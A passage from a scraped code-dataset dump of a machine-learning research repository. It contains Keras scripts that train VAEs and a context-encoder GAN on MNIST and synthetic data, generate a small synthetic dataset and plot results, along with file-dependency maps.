mask[np.triu_indices_from(mask)] = True
mask[np.diag_indices_from(mask)] = False
# Create heatmap of correlation coefficients
plt.figure()
seaborn.heatmap(training_set_latent_correlations, cmap='RdYlGn_r', vmax=1.0, vmin=-1.0, mask=mask, linewidths=2.5)
# Change orientation of labels for easier readability
plt.yticks(rotation=0)
plt.xticks(rotation=90)
# Label Axes
plt.xlabel('Latent Dimension')
plt.ylabel('Latent Dimension')
# Save plot
plt.savefig('cifar10_training_set_latent_corrs')
# Plot histogram of correlation distribution
plt.figure()
plt.hist(training_set_latent_correlations, 100, facecolor='green', alpha=0.5)
plt.xlim(-0.4, 0.4)
#plt.ylim(0, 500)
plt.savefig('cifra10_training_set_corrs_distrib') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,467 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_vae_train.py | from __future__ import print_function, division
import numpy as np
import keras.backend as K
from keras.layers import Input, Lambda
from keras.models import Model
from keras import metrics
from keras.callbacks import EarlyStopping, ModelCheckpoint
from common_models.common_models import vae_encoder_sampling_model, vae_model
from sd_models import vae_encoder_model, generator_model
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import save_reconstructions, save_latent_vis, plot_train_loss
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_dim = 4
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 2
num_classes = 16
epsilon_std = 0.05
image_path = 'Images/sd_vae'
model_path = 'Models/sd_vae'
# =====================================
# Load dataset
# =====================================
# Load dataset
X_train = np.loadtxt('Dataset/synthetic_dataset_x_train.txt', dtype=np.float32)
X_test = np.loadtxt('Dataset/synthetic_dataset_x_test.txt', dtype=np.float32)
y_train = np.loadtxt('Dataset/synthetic_dataset_y_train.txt', dtype=np.int)
y_test = np.loadtxt('Dataset/synthetic_dataset_y_test.txt', dtype=np.int)
# Reshape data to image format
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, channels)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, channels)
# =====================================
# Instantiate and compile models
# =====================================
# Define sampling function
def sampling(args):
z_mean, z_log_var = args
epsilon = K.random_normal(shape=(K.shape(z_mean)[0], latent_dim),
mean=0., stddev=epsilon_std)
return z_mean + K.exp(z_log_var / 2) * epsilon
# Instantiate models
encoder = vae_encoder_model()
generator = generator_model()
# Define VAE model
x = Input(shape=img_shape)
z_mean, z_log_var = encoder(x)
z = Lambda(sampling, output_shape=(latent_dim,))([z_mean, z_log_var])
recon_x = generator(z)
vae = Model(x, recon_x)
# Define VAE loss and compile model
xent_loss = np.prod(img_shape) * K.mean(metrics.binary_crossentropy(x, recon_x))
kl_loss = - 0.5 * K.sum(1 + z_log_var - K.square(z_mean) - K.exp(z_log_var), axis=-1)
vae_loss = K.mean(xent_loss + kl_loss)
vae.add_loss(vae_loss)
vae.compile(optimizer='rmsprop', loss=None)
# =====================================
# Train models
# =====================================
# Specify training hyper-parameters
epochs = 20
batch_size = 128
patience = 10
# Specify callbacks for training
early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=patience, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(filepath=model_path+'.h5', monitor='val_loss', verbose=1, save_best_only=True,
mode='min')
callbacks = [early_stopping, model_checkpoint]
# Train model
history = vae.fit(X_train,
epochs=epochs,
batch_size=batch_size,
shuffle=True,
callbacks=callbacks,
validation_data=(X_test, None))
# Replace current encoder and decoder models with that from the best save autoencoder
encoder = vae_encoder_model()
sampled_encoder = vae_encoder_sampling_model(encoder, latent_dim, img_shape, epsilon_std)
generator = generator_model()
vae = vae_model(sampled_encoder, generator, img_shape)
vae.load_weights(model_path + '.h5')
# Save encoder and decoder models
save_models(path=model_path, encoder=encoder, generator=generator)
# =====================================
# Visualizations
# =====================================
# Save reconstructions of test images
save_reconstructions(image_path, num_classes, X_test, y_test, generator, sampled_encoder, img_rows, img_cols, channels, color=False)
# Save latent space visualization
save_latent_vis(image_path, X_train, y_train, sampled_encoder, num_classes)
# Plot training curves
plot_train_loss(image_path, history) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,468 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/synthetic_dataset/sd_generate_dataset.py | '''Script used to generate a synthetic dataset to enable 2D latent space visualizations'''
from __future__ import print_function
import numpy as np
# Settings
latent_dim = 2
img_rows = 2
img_cols = 2
channels = 1
img_shape = (img_rows, img_cols, channels)
num_classes = 16
num_train_examples = 5000 * num_classes
num_test_examples = 1000 * num_classes
variance = 0.07
# Create label arrays
y_train = np.random.choice(list(range(num_classes)), size=(num_train_examples,))
y_test = np.random.choice(list(range(num_classes)), size=(num_test_examples,))
# Create zero arrays for data
X_train = np.zeros((num_train_examples, np.prod(img_shape)))
X_test = np.zeros((num_test_examples, np.prod(img_shape)))
# Create data as binary version of label e.g. label 9 -> 1001
for i, y in enumerate(y_train):
X_train[i] = np.array([int(x) for x in list('{:04b}'.format(y))])
for i, y in enumerate(y_test):
X_test[i] = np.array([int(x) for x in list('{:04b}'.format(y))])
# Corrupt data with noise to add distinguish between samples and clip images to retain pixel values between 0 and 1
noise_factor = 0.07
X_train = X_train + noise_factor * np.random.normal(0., 1, size=X_train.shape)
X_test = X_test + noise_factor * np.random.normal(0., 1, size=X_test.shape)
X_train = np.clip(X_train, 0., 1.)
X_test = np.clip(X_test, 0., 1.)
# Save dataset
for data, name in [(X_train, 'x_train'), (X_test, 'x_test')]:
np.savetxt('Dataset/synthetic_dataset_' + name + '.txt', data, fmt='%f')
for data, name in [(y_train, 'y_train'), (y_test, 'y_test')]:
np.savetxt('Dataset/synthetic_dataset_' + name + '.txt', data, fmt='%d')
| {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,469 | davidhayes3/ME-Project | refs/heads/master | /semi_supervised/augmentation/plot_results.py | import numpy as np
import matplotlib.pyplot as plt
num_unlabelled = [200, 500, 1000, 2000, 5000, 10000, 20000, 30000, 50000]
pretrained_acc = np.loadtxt('Results/classifier1.txt', dtype=np.float32)
pretrained_aug_acc = np.loadtxt('Results/classifier2.txt', dtype=np.float32)
pretrained_lastconv_acc = np.loadtxt('Results/classifier3.txt', dtype=np.float32)
pretrained_lastconv_aug_acc = np.loadtxt('Results/classifier4.txt', dtype=np.float32)
random_acc = np.loadtxt('Results/classifier5.txt', dtype=np.float32)
random_aug_acc = np.loadtxt('Results/classifier6.txt', dtype=np.float32)
pretrained_trainable_acc = np.loadtxt('Results/classifier7.txt', dtype=np.float32)
pretrained_trainable_aug_acc = np.loadtxt('Results/classifier8.txt', dtype=np.float32)
# =====================================
# Visualize results
# =====================================
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, pretrained_acc, '-o', num_unlabelled, random_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Encoder', 'Randomly Initialized Encoder'], loc='lower right')
plt.grid()
plt.savefig('cifar10_pretrained_fully_sup_compar.png')
# Plot comparison graph
plt.figure()
plt.plot(num_unlabelled, pretrained_acc, '-o', num_unlabelled, pretrained_aug_acc, '-o',
num_unlabelled, pretrained_trainable_acc, '-o', num_unlabelled, pretrained_trainable_aug_acc, '-o',
num_unlabelled, random_aug_acc, '-o')
plt.ylabel('Test Accuracy (%)')
plt.xlabel('No. of labelled examples')
plt.legend(['BiGAN Frozen', 'BiGAN Frozen + Augmentation', 'BiGAN Trainable', 'BiGAN Trainable + Augmentation',
'Randomly Initialized + Augmentation'], loc='lower right')
plt.grid()
plt.savefig('cifar10_pretrained_aug_compar.png') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,470 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnist_ce_train.py | from __future__ import print_function, division
from functions.data_funcs import get_mnist
from functions.auxiliary_funcs import save_models
from functions.visualization_funcs import plot_gan_epoch_loss, plot_gan_batch_loss, plot_discriminator_acc
from mnist_mlp_models import encoder_model, context_generator_model, context_discriminator_model
from common_models.common_models import autoencoder_model
from keras.layers import Input
from keras.models import Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import numpy as np
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
mask_height = 8
mask_width = 8
channels = 1
img_shape = (img_rows, img_cols, channels)
missing_shape = (mask_height, mask_width, channels)
num_classes = 10
image_path = 'Images/mnist_ce'
model_path = 'Models/mnist_ce'
# =====================================
# Load dataset
# =====================================
# Load MNIST dataset in range [-1,1]
(X_train, y_train), (X_test, y_test) = get_mnist(gan=True)
# =====================================
# Define necessary functions
# =====================================
def sample_images(path, epoch, imgs):
r, c = 3, 6
masked_imgs, missing_parts, (y1, y2, x1, x2) = mask_randomly(imgs)
gen_missing = generator.predict(encoder.predict(masked_imgs))
imgs = 0.5 * imgs + 0.5
masked_imgs = 0.5 * masked_imgs + 0.5
gen_missing = 0.5 * gen_missing + 0.5
fig, axs = plt.subplots(r, c)
for i in range(c):
axs[0, i].imshow(imgs[i].reshape(img_rows, img_cols))
axs[0, i].axis('off')
axs[1, i].imshow(masked_imgs[i].reshape(img_rows, img_cols))
axs[1, i].axis('off')
filled_in = imgs[i].copy()
filled_in[y1[i]:y2[i], x1[i]:x2[i], :] = gen_missing[i]
axs[2, i].imshow(filled_in.reshape(img_rows, img_cols))
axs[2, i].axis('off')
plt.gray()
fig.savefig(path + '_%d.png' % epoch)
plt.close()
# Function to mask a random square of pixels in image
def mask_randomly(imgs):
# Randomly choose co-ordinates for the masking of each image in imgs
y1 = np.random.randint(0, img_rows - mask_height, imgs.shape[0])
y2 = y1 + mask_height
x1 = np.random.randint(0, img_rows - mask_width, imgs.shape[0])
x2 = x1 + mask_width
# Empty matrix for masked images
masked_imgs = np.empty_like(imgs)
# Empty array for masks
missing_parts = np.empty((imgs.shape[0], mask_height, mask_width, channels))
# Loop through all images
for i, img in enumerate(imgs):
# Copy full image to masked image
masked_img = img.copy()
# Determine co-ordinates to be masked for this particular image
_y1, _y2, _x1, _x2 = y1[i], y2[i], x1[i], x2[i]
# Save mask in separate array
missing_parts[i] = masked_img[_y1:_y2, _x1:_x2, :].copy()
# Remove mask from full image
masked_img[_y1:_y2, _x1:_x2, :] = 0
# Save masked image
masked_imgs[i] = masked_img
return masked_imgs, missing_parts, (y1, y2, x1, x2)
# =====================================
# Instantiate & compile models
# =====================================
# Instantiate models
encoder = encoder_model()
generator = context_generator_model(missing_shape)
context_generator = autoencoder_model(encoder, generator)
discriminator = context_discriminator_model(missing_shape)
# Specify optimizer for models
lr = 0.0002
beta_1 = 0.5
optimizer = Adam(lr=lr, beta_1=beta_1)
# Compile models
context_generator.compile(loss=['binary_crossentropy'], optimizer=optimizer)
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
# Define context encoder model
masked_img = Input(shape=img_shape)
enc_img = encoder(masked_img)
gen_mask = generator(enc_img)
validity = discriminator(gen_mask)
context_encoder = Model(masked_img, [gen_mask, validity])
# Compile model
discriminator.trainable = False
context_encoder.compile(loss=['mse', 'binary_crossentropy'],optimizer=optimizer)
# =====================================
# Train models
# =====================================
# Set training hyper-parameters
epochs = 50
batch_size = 128
epoch_save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
d_acc_trajectory = np.zeros(epochs)
# Train for set number of epochs
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
d_acc = 0
# Shuffle training set
new_permutation = np.random.randint(0, X_train.shape[0], X_train.shape[0])
X_train = X_train[new_permutation]
# Train on all batches
for batch in range(num_batches):
# Labels for supervised training
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
# ---------------------
# Train Discriminator
# ---------------------
# Select next batch of images from training set and encode
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
masked_imgs, missing_piece, _ = mask_randomly(imgs)
# Generate a half batch of new images
gen_missing_piece = generator.predict(encoder.predict(masked_imgs))
# Train the discriminator
d_loss_real = discriminator.train_on_batch(missing_piece, valid)
d_loss_fake = discriminator.train_on_batch(gen_missing_piece, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
d_acc += d_loss[1]
# ---------------------
# Train Generator
# ---------------------
# Train the generator
g_loss = context_encoder.train_on_batch(masked_imgs, [missing_piece, valid])
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch+1, batch, num_batches,
d_loss[0], 100 * d_loss[1],
g_loss[0]))
# Record epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
d_acc_trajectory[epoch] = 100 * (d_acc / num_batches)
# If at save interval, save generated image samples
if epoch % epoch_save_interval == 0:
# Select a random half batch of images
idx = np.random.randint(0, X_train.shape[0], 6)
imgs = X_train[idx]
sample_images(image_path, epoch, imgs)
# Save encoder weights
save_models(path=model_path, encoder=encoder)
# =====================================
# Visualizations
# =====================================
# Save loss curves
plot_gan_batch_loss(image_path, epochs, num_batches, d_batch_loss_trajectory, g_batch_loss_trajectory)
plot_gan_epoch_loss(image_path, epochs, d_epoch_loss_trajectory, g_epoch_loss_trajectory)
plot_discriminator_acc(image_path, epochs, d_acc_trajectory) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], 